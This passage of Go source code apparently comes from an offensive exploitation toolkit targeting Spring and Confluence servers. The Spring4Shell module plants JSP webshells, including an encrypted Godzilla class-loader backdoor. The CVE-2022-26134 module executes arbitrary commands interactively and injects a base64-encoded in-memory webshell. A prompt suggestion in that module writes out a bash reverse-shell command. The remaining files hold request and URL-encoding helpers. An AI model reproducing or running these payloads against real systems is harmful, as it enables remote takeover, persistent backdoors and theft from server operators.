哥斯拉 pass key 25 | beichen = 
"%25%7Bprefix%7Di!%20String%20xc%3D%223c6e0b8a9c15224a%22%3B%20class%20X%20extends%20ClassLoader%7Bpublic%20X(ClassLoader%20z)%7Bsuper(z)%3B%7Dpublic%20Class%20Q(byte%5B%5D%20cb)%7Breturn%20super.defineClass(cb%2C%200%2C%20cb.length)%3B%7D%20%7Dpublic%20byte%5B%5D%20x(byte%5B%5D%20s%2Cboolean%20m)%7B%20try%7Bjavax.crypto.Cipher%20c%3Djavax.crypto.Cipher.getInstance(%22AES%22)%3Bc.init(m%3F1%3A2%2Cnew%20javax.crypto.spec.SecretKeySpec(xc.getBytes()%2C%22AES%22))%3Breturn%20c.doFinal(s)%3B%20%7Dcatch%20(Exception%20e)%7Breturn%20null%3B%20%7D%7D%25%7Bsuffix%7Di%25%7Bprefix%7Ditry%7Bbyte%5B%5D%20data%3Dnew%20byte%5BInteger.parseInt(request.getHeader(%22Content-Length%22))%5D%3Bjava.io.InputStream%20inputStream%3D%20request.getInputStream()%3Bint%20_num%3D0%3Bwhile%20((_num%2B%3DinputStream.read(data%2C_num%2Cdata.length))%3Cdata.length)%3Bdata%3Dx(data%2C%20false)%3Bif%20(session.getAttribute(%22payload%22)%3D%3Dnull)%7Bsession.setAttribute(%22payload%22%2Cnew%20X(this.getClass().getClassLoader()).Q(data))%3B%7Delse%7Brequest.setAttribute(%22parameters%22%2C%20data)%3BObject%20f%3D((Class)session.getAttribute(%22payload%22)).newInstance()%3Bjava.io.ByteArrayOutputStream%20arrOut%3Dnew%20java.io.ByteArrayOutputStream()%3Bf.equals(arrOut)%3Bf.equals(pageContext)%3Bf.toString()%3Bresponse.getOutputStream().write(x(arrOut.toByteArray()%2C%20true))%3B%7D%20%7Dcatch%20(Exception%20e)%7B%7D%25%7Bsuffix%7Di" 26 | file_date_data = "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=_" 27 | pattern_data = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=" 28 | ) 29 | 30 | func (p CVE202222965) SendPoc(target string, hashmap map[string]interface{}) { 31 | shellname := utils.GetCode(6) 32 | time.Sleep(time.Second * 1) 33 | shellname1 := utils.GetCode(8) 34 | log.Debugf("shellname: %s", shellname) 35 | log.Debugf("shellname1: %s", shellname1) 36 | payload1 := body + context + body1 + shellname + body2 37 | rebeyond := body + 
beichen + body1 + shellname1 + body2 38 | //TODO implement me 39 | log.Debugf("[+] Running CVE202222965 poc") 40 | reqinfo := req2.NewReqInfo() 41 | reqmap := structs.Map(reqinfo) 42 | get_headers := map[string]string{ 43 | "suffix": "%>", 44 | "c": "Runtime", 45 | "prefix": "<%", 46 | "User-Agent": utils.GetUA(), 47 | } 48 | post_get_headers := map[string]string{ 49 | "User-Agent": utils.GetUA(), 50 | "Content-Type": "application/x-www-form-urlencoded", 51 | } 52 | 53 | reqmap["url"] = target 54 | 55 | // 默认配置 56 | reqmap["timeout"] = hashmap["Timeout"].(int) 57 | reqmap["retry"] = hashmap["Retry"].(int) 58 | reqmap["proxy"] = hashmap["Proxy"].(string) 59 | reqmap["mode"] = hashmap["Mode"].(int) 60 | reqmap["h1"] = hashmap["H1"].(bool) 61 | reqmap["redirect"] = hashmap["Redirect"].(bool) 62 | f := 0 63 | for f < 2 { 64 | time.Sleep(time.Second * 1) 65 | // 设置 payload 66 | reqmap["method"] = "POST" 67 | reqmap["body"] = file_date_data 68 | reqmap["headers"] = post_get_headers 69 | utils.Send(reqmap) 70 | 71 | if f == 0 { 72 | // 第二个请求 73 | //reqmap["body"] = payload1 74 | reqmap["body"] = rebeyond 75 | reqmap["headers"] = post_get_headers 76 | 77 | } else { 78 | reqmap["body"] = payload1 79 | reqmap["headers"] = post_get_headers 80 | } 81 | utils.Send(reqmap) 82 | // Changes take some time to populate on tomcat 83 | time.Sleep(time.Second * 3) 84 | if f == 1 { 85 | 86 | r, _ := url.Parse(target) 87 | log.Info("[+] CVE202222965 poc success") 88 | cmdshell := r.Scheme + "://" + r.Host + "/" + shellname + ".jsp" 89 | beichenshell := r.Scheme + "://" + r.Host + "/" + shellname1 + ".jsp" 90 | reqmap["url"] = cmdshell 91 | reqmap["method"] = "GET" 92 | reqmap["body"] = "" 93 | reqmap["headers"] = post_get_headers 94 | resp1 := utils.Send(reqmap) 95 | reqmap["url"] = beichenshell 96 | resp2 := utils.Send(reqmap) 97 | if resp1 != nil && resp2 != nil { 98 | if p.CheckExp(resp1, cmdshell, hashmap) && p.CheckExp(resp2, beichenshell, hashmap) { 99 | log.Info("[+] CVE202222965 
poc success") 100 | res := target + " 可能存在CVE202222965没有进行验证 手动验证: " + r.Scheme + "://" + r.Host + "/" + shellname + ".jsp" + "?cmd=whoami or " + r.Scheme + "://" + r.Host + "/" + shellname1 + ".jsp 哥斯拉 pass key " 101 | log.Info(res) 102 | p.SaveResult(res, hashmap["Out"].(string)) 103 | } 104 | 105 | } 106 | 107 | } 108 | 109 | // 第三个请求 110 | reqmap["method"] = "GET" 111 | reqmap["body"] = "" 112 | reqmap["headers"] = get_headers 113 | utils.Send(reqmap) 114 | 115 | time.Sleep(time.Second * 1) 116 | reqmap["body"] = pattern_data 117 | reqmap["method"] = "POST" 118 | reqmap["headers"] = post_get_headers 119 | utils.Send(reqmap) 120 | f++ 121 | } 122 | } 123 | 124 | func (p CVE202222965) SaveResult(target string, file string) { 125 | err := utils.SaveToFile(target, file) 126 | if err != nil { 127 | log.Debugf("[-] Save result failed") 128 | log.Debugf(err.Error()) 129 | return 130 | } 131 | } 132 | 133 | func (p CVE202222965) CheckExp(resp *req.Response, target string, hashmap map[string]interface{}) bool { 134 | if resp.IsSuccess() { 135 | return true 136 | } 137 | return false 138 | } 139 | -------------------------------------------------------------------------------- /cmd/commons/poc/2022/CVE-2022-26134.go: -------------------------------------------------------------------------------- 1 | package _022 2 | 3 | import ( 4 | "fmt" 5 | req2 "github.com/SummerSec/SpringExploit/cmd/commons/req" 6 | resp2 "github.com/SummerSec/SpringExploit/cmd/commons/resp" 7 | "github.com/SummerSec/SpringExploit/cmd/commons/utils" 8 | "github.com/c-bata/go-prompt" 9 | "github.com/imroc/req/v3" 10 | log "github.com/sirupsen/logrus" 11 | ) 12 | 13 | const beichen26134 = "${#a=new javax.script.ScriptEngineManager().getEngineByName(\"js\").eval(@com.opensymphony.webwork.ServletActionContext@getRequest().getParameter(\"search\")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(\"X-Status\",\"ok\"))}" 14 | const memshell26134 = 
"search=var+classBytes+%3D+java.util.Base64.getDecoder%28%29.decode%28%22yv66vgAAADQBjwoAaADRCgBoANIJAEwA0wkATADUCADVCgAMANYHANcIANgHANkKANoA2woA2gDcBwDdCgDeAN8KAEwA4AoATADhBwDiCADjCADkCgAMAOUHAOYKAOcA6AgA6QoATADqCADrCgBMAOwKABQA7QgA7goADADvCgDnAPAIAPEKAOcA8ggA8woALwD0CgBMAPUHAPYKACMA0goAIwD3CgAjAPgHAKkKAEwA%2BQoADAD6BwD7CgAMAPwKACoA8AoAKgD9CACxBwD%2BCAC1CAD%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%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%2BAQAKU291cmNlRmlsZQEADU1lbVNoZWxsLmphdmEMAHMAdAwAcwB8DABsAG0MAGoAawEAJmpha2FydGEuc2VydmxldC5TZXJ2bGV0UmVxdWVzdExpc3RlbmVyDAE3ATgBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQAkamF2YXguc2VydmxldC5TZXJ2bGV0UmVxdWVzdExpc3RlbmVyAQAgamF2YS9sYW5nL0NsYXNzTm90Rm91bmRFeGNlcHRpb24HATkMAToBOwwBPAE9AQAPamF2YS9sYW5nL0NsYXNzBwE%2BDAE%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%2BxAAUAEgAYABsABwAcACIAJQAJABAARgBJABAACgBQAFMAAABTAFcAUwAAAAMAdgAAAEYAEQAAABQABAAVAAoAFgAQABgAEgAaABgAIQAbABsAHAAdACIAIAAlAB4AJwAiACsAIwBGACcASQAlAEoAKABOACoAWgArAHcAAAAgAAMAHAALAH0AfgADABIANAB%2FAG8AAgAAAFsAeAGOAAAAgAAAAD4ACf8AGwADBwCBBwCCBwCDAAEHAIT%2FAAkABAcAgQcAggcAgwcAhAABBwCF%2BgAB%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%2BogApLRUFMjoGGQbGABEZBBkGtgAatgAlV6cAChkEAbYAJVeEBQGn%2F9YqK7YAGiwZBAO9AAy2ACbAACfAACe3ACg6BRkFKy22ABWwOgQBsAABAAAAXgBfAAcAAwB2AAAAMgAMAAAASwAJAEwADQBNABcATgAdAE8AIgBQADAAUgA3AE0APQBWAFcAWABfAFkAYQBcAHcAAABSAAgAHQAaAJsAbQAGABAALQCcAJ0ABQAJAFYAngCfAAQAVwAIAJYAkAAFAAAAYwB4AY4AAAAAAGMAoABtAAEAAABjAKEAcQACAAAAYwCiAJgAAwCAAAAAKwAF%2FQAQBwCjAfwAHwcAgvoABvoABf8AIQAEBwCBBwCCBwCkBwClAAEHAIQAggCmAKcAAQB1AAAAuAADAAYAAAAhAToEK8YAGissLbYAEzoEAUyn%2F%2FI6BSu2AClMp%2F%2FoGQSwAAEABwARABQABwADAHYAAAAmAAkAAABfAAMAYAAHAGIADwBjABEAZgAUAGQAFgBlABsAZgAeAGgAdwAAAD4ABgAWAAUAfQB%2BAAUAAAAhAHgBjgAAAAAAIQCoAG8AAQAAACEAoQBxAAIAAAAhAKIAqQADAAMAHgCWAJAABACAAAAADQAD%2FAADBwCqUAcAhAkACQCrAKwAAgB1AAAA%2BAACAAYAAABCAU0qwQAqmQALKsAAKk2nACkBTiq2ABo6BBkExgAcGQQrtgArTQE6BKf%2F8ToFGQS2ACk6BKf%2F5SwEtgAsLCq2AC2wAAEAHgAoACsABwADAHYAAAA6AA4AAABrAAIAbAAJA
G0AEQBvABMAcAAZAHEAHgBzACUAdAAoAHcAKwB1AC0AdgA0AHcANwB6ADwAewB3AAAAPgAGAC0ABwB9AH4ABQATACQAlgCQAAMAGQAeAKgAbwAEAAAAQgCgAG0AAAAAAEIArQBxAAEAAgBAAK4ArwACAIAAAAAYAAT8ABEHALD9AAcHAKoHAINRBwCE%2BQALAJEAAAAEAAEABwABALEAsgABAHUAAABRAAcAAwAAABMqKxIuBL0AFFkDLFO3ABfAAC%2BwAAAAAgB2AAAABgABAAAAfgB3AAAAIAADAAAAEwB4AY4AAAAAABMAswBtAAEAAAATALQAcQACAAEAtQC2AAEAdQAAAEMABAACAAAADyorEjADvQAUtwAXwAAvsAAAAAIAdgAAAAYAAQAAAIEAdwAAABYAAgAAAA8AeAGOAAAAAAAPALMAbQABAAEAtwC4AAEAdQAAANcABgAEAAAAKxIxuAAyTi0cmQAHBKcABAW7ADNZsgA0tgA1EjG3ADa2ADctK7YAOLBOAbAAAQAAACcAKAAHAAMAdgAAABYABQAAAIcABgCIACIAiQAoAIoAKQCLAHcAAAA0AAUABgAiALkAugADACkAAgB9AH4AAwAAACsAeAGOAAAAAAArALsAvAABAAAAKwC9AGsAAgCAAAAAPAAD%2FwAPAAQHAIEHAL4BBwC%2FAAEHAL%2F%2FAAAABAcAgQcAvgEHAL8AAgcAvwH%2FABcAAwcAgQcAvgEAAQcAhAAJAMAAwQABAHUAAACPAAQAAwAAADABTBI5uAA6TSwqtgA1Ayq2ADu2ADy7AD1ZBCy2AD63AD8QELYAQLYAQUynAARNK7AAAQACACoALQAHAAMAdgAAAAYAAQAAAI8AdwAAACAAAwAIACIAvQDCAAIAAAAwALsAcQAAAAIALgDDAHEAAQCAAAAAEwAC%2FwAtAAIHAKQHAKQAAQcAhAAAAgDEAMUAAQB1AAACYQAFAAsAAAEfKisSQgO9ABS3ABdNKiy2AENOLcYBAy0SRLYARZkA%2BiossgBGtgBHOgQZBMYA67gASBkEtgBJOgUqGQUDtgBKOgUZBcYA0xkFvp4AzbIAS8cAILsATFkstgAatgBNtwBOGQUDGQW%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%2FwBvAAYHAIEHAIIHAIIHAKQHAKQHAL4AAPgApkIHAIb6AABCBwCEAAAIAM4AfAABAHUAAAA3AAIAAAAAABsTAYmzAYcTAYyzAYoDswAEuwAUWbcAZ7MAA7EAAAABAHYAAAAKAAIADAAMABAADQACAM8AAAACANABbgAAABIAAgEaARgBbQAJAS4BGAF%2FAAk%3D%22%29%3B%0D%0Avar+loader+%3D+java.lang.Thread.currentThread%28%29.getContextClassLoader%28%29%3B%0D%0Avar+reflectUtilsClass+%3D+java.lang.Class.forName%28%22org.springframework.cglib.core.ReflectUtils%22%2Ctrue%2Cloader%29%3B%0D%0Avar+urls+%3D+java.lang.reflect.Array.newInstance%28java.lang.Class.forName%28%22java.net.URL%22%29%2C0%29%3B%0D%0A%0D%0Avar+params+%3D+java.lang.reflect.Array.newInstance%28java.lang.Class.forName%28%22java.lang.Class%22%29%2C3%29%3B%0D%0Aparams%5B0%5D+%3D+java.lang.Class.forName%28%22java.lang.String%22%29%3B%0D%0Aparams%5B1%5D+%3D+java.lang.Class.forName%28%22%5BB%22%29%3B%0D
%0Aparams%5B2%5D+%3D+java.lang.Class.forName%28%22java.lang.ClassLoader%22%29%3B%0D%0A%0D%0A%0D%0Avar+defineClassMethod+%3D+reflectUtilsClass.getMethod%28%22defineClass%22%2Cparams%29%3B%0D%0A%0D%0Aparams+%3D++java.lang.reflect.Array.newInstance%28java.lang.Class.forName%28%22java.lang.Object%22%29%2C3%29%3B%0D%0A%0D%0Aparams%5B0%5D+%3D+%22com.opensymphony.xwork.b69a837d818644c588bc3ee4832dbc42%22%3B%0D%0Aparams%5B1%5D+%3D+classBytes%3B%0D%0Aparams%5B2%5D+%3D+loader%3B%0D%0AdefineClassMethod.invoke%28null%2Cparams%29.newInstance%28%29%3B%0D%0A%22ok%22%3B%0D%0A" 15 | 16 | type CVE202226134 struct{} 17 | 18 | func (t CVE202226134) SendPoc(target string, hashmap map[string]interface{}) { 19 | 20 | reqmap := req2.NewReqInfoToMap(hashmap) 21 | reqmap["method"] = "GET" 22 | headers := map[string]string{ 23 | "User-Agent": utils.GetUA(), 24 | "Accept": "*/*", 25 | "Accept-Encoding": "gzip, deflate", 26 | } 27 | reqmap["headers"] = headers 28 | 29 | randStr := utils.GetCode(10) 30 | cmd := "echo " + randStr 31 | //cmd := "echo%20" + randStr + "%7c%62%61%73%65%36%34%20%2d%64" 32 | //cmd = "ifconfig" 33 | if hashmap["Shell"].(bool) { 34 | log.Info("[+] Start CVE-2022-26134 Shell Mode") 35 | th := prompt.Input("[+] Please input command: ", t.completer) 36 | if th == "" { 37 | th = "whoami" 38 | } 39 | cmd = th 40 | } 41 | payload := fmt.Sprintf("${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(\"%s\").getInputStream(),\"utf-8\")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(\"Host\",#a))}", cmd) 42 | payload, _ = req2.Encode(payload, "utf8") 43 | target1 := target + payload + "/" 44 | 45 | //log.Debug("[+] Target: ", target) 46 | reqmap["url"] = target1 47 | 48 | resp := utils.Send(reqmap) 49 | 50 | res := resp2.HandlerRespHeader(resp, "Host") 51 | if t.CheckExp(resp, target1, hashmap) { 52 | if res != "" { 53 | //res = utils.DecodeBase64String(res) 54 | log.Infof("[+] Success CVE-2022-26134 %s", target) 55 | if 
hashmap["Shell"].(bool) { 56 | log.Infof("[+] 命令执行结果: %s", res) 57 | log.Info("[+] End CVE-2022-26134 shell") 58 | } else { 59 | result := fmt.Sprintf(" %s 存在 CVE-2022-26134 漏洞, 可以使用 SpringExploit -u %s -p CVE202226134 -shell 进入交互式执行命令", target1, target1) 60 | t.SaveResult(result, hashmap["Out"].(string)) 61 | } 62 | } 63 | } 64 | 65 | reqmap["method"] = "POST" 66 | temp, _ := req2.Encode(beichen26134, "utf8") 67 | reqmap["url"] = target + temp + "/" 68 | reqmap["body"] = memshell26134 69 | resp1 := utils.Send(reqmap) 70 | isok := resp2.HandlerRespHeader(resp1, "X-Status") 71 | if isok != "" { 72 | result := fmt.Sprintf("%s 注入哥斯拉内存马成功,密码 pass key 哥斯拉如果连接不上请添加请求头 Connection: close 参考https://github.com/BeichenDream/CVE-2022-26134-Godzilla-MEMSHELL ") 73 | t.SaveResult(result, hashmap["Out"].(string)) 74 | } 75 | 76 | } 77 | 78 | func (CVE202226134) SaveResult(target string, file string) { 79 | log.Info(target) 80 | err := utils.SaveToFile(target, file) 81 | if err != nil { 82 | log.Debugf("[-] Save result error: %s %s", target, err) 83 | return 84 | } 85 | } 86 | 87 | func (CVE202226134) CheckExp(resp *req.Response, target string, hashmap map[string]interface{}) bool { 88 | 89 | if !resp.IsSuccess() { 90 | return true 91 | } else { 92 | return false 93 | } 94 | 95 | } 96 | 97 | func (t CVE202226134) completer(d prompt.Document) []prompt.Suggest { 98 | s := []prompt.Suggest{ 99 | {Text: "id", Description: "you can type command {id}"}, 100 | {Text: "bash", Description: "you can type command bash -c $@|bash 0 echo bash -i >& /dev/tcp/127.0.0.1/8090 0>&1"}, 101 | } 102 | return prompt.FilterHasPrefix(s, d.GetWordBeforeCursor(), true) 103 | } 104 | -------------------------------------------------------------------------------- /cmd/commons/poc/IsAliveUrl.go: -------------------------------------------------------------------------------- 1 | package poc 2 | 3 | import ( 4 | req2 "github.com/SummerSec/SpringExploit/cmd/commons/req" 5 | 
"github.com/SummerSec/SpringExploit/cmd/commons/utils" 6 | "github.com/imroc/req/v3" 7 | log "github.com/sirupsen/logrus" 8 | ) 9 | 10 | type IsAliveUrl struct{} 11 | 12 | func (t IsAliveUrl) SendPoc(target string, hashmap map[string]interface{}) { 13 | reqmap := req2.NewReqInfoToMap(hashmap) 14 | reqmap["url"] = target 15 | reqmap["method"] = "HEAD" 16 | headers := map[string]string{ 17 | "User-Agent": utils.GetUA(), 18 | } 19 | reqmap["headers"] = headers 20 | resp := utils.Send(reqmap) 21 | if t.CheckExp(resp, target, hashmap) { 22 | log.Infof("[+] %s is alive", target) 23 | } 24 | 25 | } 26 | 27 | func (t IsAliveUrl) SaveResult(target string, file string) { 28 | // nothing to do 29 | } 30 | 31 | func (t IsAliveUrl) CheckExp(resp *req.Response, target string, hashmap map[string]interface{}) bool { 32 | reqmap := req2.NewReqInfoToMap(hashmap) 33 | reqmap["url"] = target 34 | reqmap["method"] = "HEAD" 35 | reqmap["redirect"] = true 36 | headers := map[string]string{ 37 | "User-Agent": utils.GetUA(), 38 | } 39 | reqmap["headers"] = headers 40 | resp2 := utils.Send(reqmap) 41 | intcode := resp2.GetStatusCode() 42 | log.Debugf(" %d ", intcode) 43 | 44 | if intcode >= 0 { 45 | return true 46 | } 47 | return true 48 | } 49 | -------------------------------------------------------------------------------- /cmd/commons/poc/PoC.go: -------------------------------------------------------------------------------- 1 | package poc 2 | 3 | import "github.com/imroc/req/v3" 4 | 5 | // PoC poc接口 6 | type PoC interface { 7 | SendPoc(target string, hashmap map[string]interface{}) 8 | SaveResult(target string, file string) 9 | CheckExp(resp *req.Response, target string, hashmap map[string]interface{}) bool 10 | } 11 | -------------------------------------------------------------------------------- /cmd/commons/poc/demo.go: -------------------------------------------------------------------------------- 1 | package poc 2 | 3 | import ( 4 | req2 
"github.com/SummerSec/SpringExploit/cmd/commons/req" 5 | "github.com/SummerSec/SpringExploit/cmd/commons/utils" 6 | "github.com/c-bata/go-prompt" 7 | "github.com/imroc/req/v3" 8 | log "github.com/sirupsen/logrus" 9 | ) 10 | 11 | type Demo struct{} 12 | 13 | func (d Demo) SendPoc(target string, hashmap map[string]interface{}) { 14 | 15 | log.Debugf("[+] Running default poc") 16 | //reqinfo := req2.NewReqInfo() 17 | //reqmap := structs.Map(reqinfo) 18 | reqmap := req2.NewReqInfoToMap(hashmap) 19 | // TODO 每次传入的url 都是标准的 http(s)://host:port/path 20 | // 可以使用 url.Parse 来解析获取 host 和 port 21 | // for example: 22 | //result, err := url.Parse(target) 23 | //if err != nil { 24 | // log.Debugln("[-] url parse error") 25 | // log.Errorf("[-] url parse error: %s", err) 26 | // return 27 | //} 28 | //target = result.Scheme + "://" + result.Host + result.Port() + "/" + result.Path 29 | 30 | reqmap["url"] = target 31 | 32 | // 请求方法 33 | reqmap["method"] = "GET" 34 | // 默认随机UA 不需要设置 35 | reqmap["headers"] = map[string]string{ 36 | "User-Agent": utils.GetUA(), 37 | } 38 | // 请求body 39 | reqmap["body"] = "" 40 | 41 | // TODO 可以设置超时时间 重复次数 代理等 下面默认使用默认值 42 | //reqmap["timeout"] = hashmap["Timeout"].(int) 43 | //reqmap["retry"] = hashmap["Retry"].(int) 44 | //reqmap["proxy"] = hashmap["Proxy"].(string) 45 | //reqmap["mode"] = hashmap["Mode"].(int) 46 | //reqmap["h1"] = hashmap["H1"].(bool) 47 | // 发送请求, 获取响应 resp := utils.Send(reqmap) 48 | 49 | resp := utils.Send(reqmap) 50 | log.Debugln("[+] resp: ", resp.Dump()) 51 | 52 | // TODO check exp 53 | d.CheckExp(resp, target, hashmap) 54 | 55 | // TODO 保存结果 56 | d.SaveResult(target, hashmap["Out"].(string)) 57 | 58 | } 59 | 60 | func (d Demo) init() { 61 | log.Debugln("[+] Registering Demo poc") 62 | 63 | } 64 | 65 | // SaveResult 保存结果 66 | func (d Demo) SaveResult(target, file string) { 67 | log.Debugf("[+] save result") 68 | // TODO 保存结果 69 | utils.SaveToFile(target, file) 70 | 71 | } 72 | 73 | func (d Demo) CheckExp(resp *req.Response, 
target string, hashmap map[string]interface{}) bool { 74 | defer func() { 75 | if err := recover(); err != nil { 76 | log.Error("[-] CheckExp error: ", err) 77 | } 78 | }() 79 | log.Debugf("[+] check exp") 80 | return false 81 | } 82 | 83 | func completer(d prompt.Document) []prompt.Suggest { 84 | s := []prompt.Suggest{ 85 | {Text: "id", Description: "you can type command {id}"}, 86 | } 87 | return prompt.FilterHasPrefix(s, d.GetWordBeforeCursor(), true) 88 | } 89 | -------------------------------------------------------------------------------- /cmd/commons/req/request.go: -------------------------------------------------------------------------------- 1 | package req 2 | 3 | import ( 4 | "github.com/fatih/structs" 5 | ) 6 | 7 | type ReqInfo struct { 8 | Method string 9 | Url string 10 | Body string 11 | Header map[string]string 12 | Proxy string 13 | Timeout string 14 | Retry string 15 | Mode string 16 | H1 bool 17 | Redirect bool 18 | } 19 | 20 | //func (r *ReqInfo) Method() string { 21 | // return r.Method 22 | //} 23 | // 24 | //func (r *ReqInfo) SetMethod(method string) { 25 | // r.Method = method 26 | //} 27 | // 28 | //func (r *ReqInfo) Url() string { 29 | // return r.Url 30 | //} 31 | // 32 | //func (r *ReqInfo) SetUrl(url string) { 33 | // r.Url = url 34 | //} 35 | // 36 | //func (r *ReqInfo) Body() string { 37 | // return r.Body 38 | //} 39 | // 40 | //func (r *ReqInfo) SetBody(body string) { 41 | // r.Body = body 42 | //} 43 | // 44 | //func (r *ReqInfo) Header() map[string]string { 45 | // return r.Header 46 | //} 47 | // 48 | //func (r *ReqInfo) SetHeader(header map[string]string) { 49 | // r.Header = header 50 | //} 51 | // 52 | //func (r *ReqInfo) Proxy() string { 53 | // return r.Proxy 54 | //} 55 | // 56 | //func (r *ReqInfo) SetProxy(proxy string) { 57 | // r.Proxy = proxy 58 | //} 59 | // 60 | //func (r *ReqInfo) Timeout() string { 61 | // return r.Timeout 62 | //} 63 | // 64 | //func (r *ReqInfo) SetTimeout(timeout string) { 65 | // r.Timeout = 
timeout 66 | //} 67 | // 68 | //func (r *ReqInfo) Repeat() string { 69 | // return r.Repeat 70 | //} 71 | // 72 | //func (r *ReqInfo) SetRepeat(repeat string) { 73 | // r.Repeat = repeat 74 | //} 75 | // 76 | //func (r *ReqInfo) Mode() string { 77 | // return r.Mode 78 | //} 79 | // 80 | //func (r *ReqInfo) SetMode(mode string) { 81 | // r.Mode = mode 82 | //} 83 | 84 | //func NewReqInfo(hashmap map[string]interface{}) *ReqInfo { 85 | // reqInfo := &ReqInfo{ 86 | // method: hashmap["method"].(string), 87 | // url: hashmap["url"].(string), 88 | // body: hashmap["body"].(string), 89 | // header: hashmap["header"].(map[string]string), 90 | // proxy: hashmap["proxy"].(string), 91 | // timeout: hashmap["timeout"].(string), 92 | // repeat: hashmap["repeat"].(string), 93 | // mode: hashmap["mode"].(string), 94 | // } 95 | // 96 | // return reqInfo 97 | //} 98 | 99 | func NewReqInfo() ReqInfo { 100 | reqInfo := ReqInfo{ 101 | Method: "", 102 | Url: "", 103 | Body: "", 104 | Header: make(map[string]string), 105 | Proxy: "", 106 | Timeout: "10", 107 | Retry: "3", 108 | Mode: "0", 109 | H1: false, 110 | Redirect: false, 111 | } 112 | return reqInfo 113 | } 114 | 115 | func NewReqInfoToMap(hashmap map[string]interface{}) map[string]interface{} { 116 | reqInfo := ReqInfo{ 117 | Method: "", 118 | Url: "", 119 | Body: "", 120 | Header: make(map[string]string), 121 | Proxy: "", 122 | Timeout: "10", 123 | Retry: "3", 124 | Mode: "0", 125 | H1: false, 126 | Redirect: false, 127 | } 128 | reqmap := structs.Map(reqInfo) 129 | reqmap["timeout"] = hashmap["Timeout"].(int) 130 | reqmap["retry"] = hashmap["Retry"].(int) 131 | reqmap["mode"] = hashmap["Mode"].(int) 132 | reqmap["h1"] = hashmap["H1"].(bool) 133 | reqmap["proxy"] = hashmap["Proxy"].(string) 134 | reqmap["redirect"] = hashmap["Redirect"].(bool) 135 | reqmap["body"] = "" 136 | 137 | return reqmap 138 | } 139 | 140 | //// UrlEncode 将传入的url进行url编码 141 | //func UrlEncode(target string) string { 142 | // 143 | // // 
对传入的字符串进行UrlEncode 144 | // 145 | // target = escape(target) 146 | // 147 | // return target 148 | // 149 | //} 150 | // 151 | //const upperhex = "0123456789ABCDEF" 152 | // 153 | //func escape(s string, ) string { 154 | // spaceCount, hexCount := 0, 0 155 | // for i := 0; i < len(s); i++ { 156 | // c := s[i] 157 | // 158 | // if c == ' ' { 159 | // spaceCount++ 160 | // } else { 161 | // hexCount++ 162 | // } 163 | // 164 | // } 165 | // 166 | // if spaceCount == 0 && hexCount == 0 { 167 | // return s 168 | // } 169 | // 170 | // var buf [64]byte 171 | // var t []byte 172 | // 173 | // required := len(s) + 2*hexCount 174 | // if required <= len(buf) { 175 | // t = buf[:required] 176 | // } else { 177 | // t = make([]byte, required) 178 | // } 179 | // 180 | // if hexCount == 0 { 181 | // copy(t, s) 182 | // for i := 0; i < len(s); i++ { 183 | // if s[i] == ' ' { 184 | // t[i] = '+' 185 | // } 186 | // } 187 | // return string(t) 188 | // } 189 | // 190 | // j := 0 191 | // for i := 0; i < len(s); i++ { 192 | // switch c := s[i]; { 193 | // case c == ' ': 194 | // t[j] = '+' 195 | // j++ 196 | // case true: 197 | // t[j] = '%' 198 | // t[j+1] = upperhex[c>>4] 199 | // t[j+2] = upperhex[c&15] 200 | // j += 3 201 | // default: 202 | // t[j] = s[i] 203 | // j++ 204 | // } 205 | // } 206 | // return string(t) 207 | //} 208 | -------------------------------------------------------------------------------- /cmd/commons/req/transform.go: -------------------------------------------------------------------------------- 1 | package req 2 | 3 | import ( 4 | "bytes" 5 | "encoding/hex" 6 | "errors" 7 | "io/ioutil" 8 | "sort" 9 | "strings" 10 | "unicode/utf8" 11 | 12 | "golang.org/x/text/encoding/simplifiedchinese" 13 | "golang.org/x/text/transform" 14 | ) 15 | 16 | const ( 17 | utf8s = "utf-8,utf8,UTF8,UTF-8" 18 | chinese = "gb2312,Gb2312,GB2312,gbk,GBK,Gbk,gb18030,GB18030,Gb18030" 19 | ) 20 | 21 | var ( 22 | rune2byte = []byte{'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 
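// matchEncoding reports whether encoding is exactly one of the comma-separated
// names listed in chinese or utf8s. gb is true for the GB-family names, which
// are all handled through the GB18030 codec.
//
// Exact matching matters: a substring test would also accept "" or "b" and
// silently select the GB18030 path.
func matchEncoding(encoding string) (gb bool, ok bool) {
	for _, name := range strings.Split(chinese, ",") {
		if name == encoding {
			return true, true
		}
	}
	for _, name := range strings.Split(utf8s, ",") {
		if name == encoding {
			return false, true
		}
	}
	return false, false
}

// UrlEncode percent-encodes the request parameters as key=value pairs joined
// by '&'. Keys are emitted in sorted order so the output is deterministic.
//
// encoding must be one of the utf-8 / gb2312 / gbk / gb18030 spellings listed
// in utf8s and chinese; any other value returns "unrecognized encoding".
// A nil map returns "" before encoding is validated.
func UrlEncode(params map[string]string, encoding string) (string, error) {
	if params == nil {
		return "", nil
	}
	isChinese, ok := matchEncoding(encoding)
	if !ok {
		return "", errors.New("unrecognized encoding")
	}

	keys := make([]string, 0, len(params))
	for k := range params {
		keys = append(keys, k)
	}
	sort.Strings(keys)

	pairs := make([]string, 0, len(keys))
	for _, k := range keys {
		pairs = append(pairs, encode(k, isChinese)+"="+encode(params[k], isChinese))
	}
	return strings.Join(pairs, "&"), nil
}

// UrlDecode parses a string produced by UrlEncode back into a map.
//
// The input is untrusted text, so a malformed percent-escape is returned as an
// error instead of being dropped. Each pair is split at the first '=' only, so
// a value that itself contains '=' is kept whole. An empty input returns
// (nil, nil).
func UrlDecode(str string, encoding string) (map[string]string, error) {
	if str == "" {
		return nil, nil
	}
	isChinese, ok := matchEncoding(encoding)
	if !ok {
		return nil, errors.New("unrecognized encoding")
	}

	parts := strings.Split(str, "&")
	rst := make(map[string]string, len(parts))
	for _, p := range parts {
		kv := strings.SplitN(p, "=", 2)
		key, err := decode(kv[0], isChinese)
		if err != nil {
			return nil, err
		}
		val := ""
		if len(kv) > 1 {
			if val, err = decode(kv[1], isChinese); err != nil {
				return nil, err
			}
		}
		rst[key] = val
	}

	return rst, nil
}

// Encode percent-encodes a single string in the given encoding.
// An empty input returns "" before encoding is validated.
func Encode(str string, encoding string) (string, error) {
	if str == "" {
		return "", nil
	}
	isChinese, ok := matchEncoding(encoding)
	if !ok {
		return "", errors.New("unrecognized encoding")
	}
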